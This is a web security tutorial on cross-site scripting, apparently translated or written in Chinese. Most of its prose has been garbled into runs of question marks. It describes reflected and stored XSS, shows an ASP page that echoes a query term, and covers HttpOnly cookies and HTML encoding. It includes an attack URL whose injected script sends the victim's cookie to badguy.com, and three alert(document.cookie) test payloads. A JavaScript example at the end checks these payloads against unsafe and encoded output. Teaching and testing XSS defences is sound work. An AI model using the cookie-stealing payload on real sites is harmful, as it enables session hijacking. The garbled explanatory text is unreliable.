Web????????XSS
???????????? ???????[ 2014/3/10 15:48:50 ] ????????XSS Web???? ??? JavaScript
????XSS ????????
????1. Dom-Based XSS ??? ????????????
????Tom ??????Victim.com?е?????????XSS?????
????????: http://victim.com/search.asp?term=apple
????????????Search.asp ?????????????
<html>
<title></title>
<body>
Results for <%=Request.QueryString("term")%>
...
</body>
</html>
????Tom ???????????http://badguy.com?? ????????“?”?????????
???????Tom ????????????url(????)?? ????????(?????QQ)????Monica
????http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
????Monica????????URL?? ?????URL?е????Javascript???????Monica????????????. ???Monica??victim.com?????cookie?? ???????badguy????С?????Monica??victim.com ???????Tom????.
????2. Stored XSS(?洢?XSS???)?? ??????????ù??????п???????Web??????????????????????????????????????Web???????????????з????????????????????й??????? ????????????
????Alex?????????A???????XSS ?????????????????????????????????У?
????Alex???????????£???????????????JavaScript????
????????????Monica??????????μ??????????????е????Javascript???????Monica???????????У????cookie???????????????Alex?????
????Dom-Based XSS?????в??????壬???洢?XSS???????в???????????????.
????XSS ??????
??????????????????????????
???????: ?????????????<script></script>??
???????????cookie????http only?? ???????Javascript ?е?document.cookie?????????cookie??.
??????????????????????????????? ???磺???????textbox?У?????????????????? ?????????????????????
?????????????Html Encode ????
?????????????????Html????? ????: <script>?? <iframe> ?? &lt; for <?? &gt; for >?? &quot; for "
????????JavaScript ????????????? "onclick="?? "onfocus" ????
??????β???XSS???
??????????? ??????????????????? ??????????????Web ????????????????? Querystring?? Form????????cookie. ??????ASP??????У????Request???????????????
<%
strUserCode = Request.QueryString("code")
strUser = Request.Form("USER")
strID = Request.Cookies("ID")
%>
?????????????о???htmlEncode????? ?????????????????XSS???
?????????????????????????
"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)
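The following is an added example, not code from the original page: it models the page's search.asp output in JavaScript, with the `term` value written raw and then HTML-encoded, and runs the three test strings above through both. The `<input>` attribute sink, the encoding of `&` and `'`, and the function names are assumptions made for the example.

```javascript
// Added example, not the original page's code: the page's search.asp sink
// modelled in JavaScript, unsafe vs. HTML-encoded.

// Entities listed on the page (< > "), plus & and ' which are added here.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function htmlEncode(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Vulnerable: the term is written into element and attribute context as-is.
// The <input> sink is an assumption; the page only shows "Results for ...".
function renderUnsafe(term) {
  return `<body>Results for ${term}<input name="term" value="${term}"></body>`;
}

// Hardened: the term is encoded at the point of output.
function renderSafe(term) {
  return renderUnsafe(htmlEncode(term));
}

// Crude structural fingerprint: tag names plus attribute names, ignoring
// text and quoted attribute values. Not a real HTML parser.
function structure(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.map((tag) => {
    const bare = tag.replace(/"[^"]*"/g, '""');
    const name = (bare.match(/^<\/?([^\s>\/]+)/) || [])[1];
    const attrs = [...bare.matchAll(/([a-zA-Z-]+)=/g)].map((m) => m[1]);
    return attrs.length ? `${name}[${attrs.join(',')}]` : name;
  }).join(' ');
}

// The three test strings from the page.
const PAYLOADS = [
  '"/><script>alert(document.cookie)</script><!--',
  '<script>alert(document.cookie)</script><!--',
  '"onclick="alert(document.cookie)',
];

// For each payload: did the page structure change (was markup injected)?
function audit(render) {
  const baseline = structure(render('apple'));
  return PAYLOADS.map((p) => structure(render(p)) !== baseline);
}

console.log('unsafe:', audit(renderUnsafe)); // [ true, true, true ]
console.log('safe:  ', audit(renderSafe));   // [ false, false, false ]
```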